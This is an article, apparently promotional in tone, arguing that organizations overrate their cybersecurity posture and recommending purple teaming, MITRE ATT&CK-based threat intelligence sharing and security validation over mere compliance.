A study conducted in early 2021 by independent research firm Sapio found an interesting cybersecurity paradox. The study showed that an overwhelming majority (90 percent) of organizations say that their security posture has improved in the past two years. However, almost the same number of respondents (86 percent) are saying that they experienced at least one severe cyber attack in the past year. The attacks encountered were so serious that they necessitated C-level or board meetings to be addressed.
It appears there is a prevailing false sense of security among organizations or their standards of what can be considered secure may be lacking. The disconnect between the confidence in cybersecurity posture and outcomes after exposures to attacks is too conspicuous to be ignored.
What can organizations do to address this problem? Convincing decision-makers to invest more in cybersecurity is itself a challenge. Now, it seems even when companies make the advised security expenditures, there’s also the problem of not doing it right resulting in excessive confidence that leads to a false sense of security.
ADDRESSING THE INCREASING SOPHISTICATION OF ATTACKS
According to the study mentioned earlier, most of the respondents mainly attribute the failure of security to the increased sophistication of attacks. They believe they are on the right track when it comes to improving their security, but they appear unable to keep up with the evolution of attacks.
However, the study also reveals that even the typical or simple attacks manage to slip through. “Even unsophisticated attacks such as business email compromise and credential phishing continue to happen across industries and can cause as much damage as nation-state attacks,” a snippet of the study reads.
Two questions need to be answered: Does the organization have the right security controls? Are these controls delivering the desired outcomes? To arrive at sensible answers, organizations should consider expert advice and a dependable cybersecurity solution. Both of which can be offered by a security posture management platform with an advanced purple teaming framework.
Having a comprehensive solution that thoroughly examines the state of an organization’s cybersecurity is a crucial first step. Many organizations are almost clueless as to what security controls and measures to put in place. Most have no idea how to perform effective security validation. If organizations cannot hire their own team of cybersecurity experts, it makes sense to turn to third-party security firms that have the expertise and experience to ensure a decent level of protection.
HOW PURPLE TEAMING HELPS
Purple teaming is a form of security testing. It involves procedures and tactics that seek to reveal vulnerabilities in an organization’s security system so that these weaknesses are patched or strengthened. It ensures that security controls are working properly and not rendered futile by sophisticated and aggressive attacks.
Purple teaming is more than just simple security validation, though. It is a relatively new strategy that is often regarded as the combination of red (attack) and blue (defense) teaming strategies, but it is something more nuanced than that. There is actually no new team formed with purple teaming. It is more of a shift in mindset and approach rather than the fusion of two teams. Essentially, it fosters collaboration between the attack and defense teams to share insights and knowledge useful in improving both teams’ efforts.
Jordan McMahon, corporate marketing officer at a renowned cybersecurity firm, has a succinct way of putting it. “Security teams today are shifting their mentality from a ‘siloed fortress’ approach to a holistic, threat-informed defense strategy enacted by ‘purple teams’ – collaborative entities formed by blending red and blue tactics,” McMahon says.
Siloing is one of the reasons why organizations end up with less-than-effective security controls. In particular, when organizations employ red and blue teams to stress-test their cyber defenses, they usually do things independently. This actually makes sense because the goal of security testing is to simulate what is actually happening to organizations when they set up their defenses and when cybercriminals attack.
However, cybersecurity professionals now share the consensus that it is better to have some degree of collaboration between the attack and defense teams. They do not necessarily have to work closely together to the point that both teams know what each other is doing. They only share insights as to how the other has prevented an attack or succeeded in penetrating the security controls instead of just letting each other figure things out on their own.
By doing this, they accelerate the process of improving their strategies and explore more possible attack surfaces and build on more potent defense ideas. Ultimately, the organization benefits from the vaster and more in-depth security validation.
PURPLE TEAMING & THREAT INTELLIGENCE SHARING
Purple teaming is also often associated with the MITRE ATT&CK framework. Advanced cybersecurity platforms that include purple teaming modules often integrate the framework, which shares useful threat intelligence including the latest adversarial tactics and techniques employed by bad actors.
McMahon herself suggests the leveraging of MITRE ATT&CK to undertake purple teaming more systematically and with inputs from the latest information about cyber threats as observed globally. “This is an invaluable resource for purple teams to prioritize testing, investing, and planning as strategies evolve to meet new and existing threats,” McMahon shares.
The spirit of threat intelligence sharing is highlighted in the Sapio study cited earlier. Accordingly, around two-thirds of organizations say that they are more likely to share cybersecurity information with their peers because of the SolarWinds incident. They realize how important it is to be able to tap into a reliable up-to-date cyber threat intelligence resource to deal with attacks better. Also, around half of the organizations surveyed say that sharing threat information with the government helps improve security postures.
Organizations acknowledge the benefits of intelligence sharing. There are no logical excuses to withhold information and veer away from using a dependable and convenient resource like the ATT&CK framework.
COMPLIANCE IS NOT SECURITY
Those who regularly read articles about cybersecurity would likely see this phrase as a cliche. However, it is worth reiterating in light of the problem of having a false sense of security among organizations.
Adhering to the security guidelines and requirements imposed by regulatory bodies does not guarantee the protection of IT networks and assets. As Forbes Technology Council Kerry Bailey explained, “A company can be 100 percent compliant and yet 100 percent owned by cybercriminals.”
Bailey used Target as a convincing example. The major American retailer was granted certification for its compliance with the payment card industry (PCI) cybersecurity standard in 2013. However, in that same year, Target suffered a major security breach that allowed cybercriminals to access its point-of-sale system.
Purple teaming is not exactly a security compliance requirement, but it is one of the best tools in ensuring that security controls are working and not silent vulnerabilities that are already being taken advantage of by malicious actors.
ACHIEVING TRUE SECURITY
The solution for the problem of having a false sense of security is security validation. Organizations cannot presume that their security controls are not going to become dysfunctional, even if they are supplied by a highly reputable security firm. For this, purple teaming can help significantly, especially for organizations that already do security testing through red teaming but continue to suffer cybersecurity setbacks.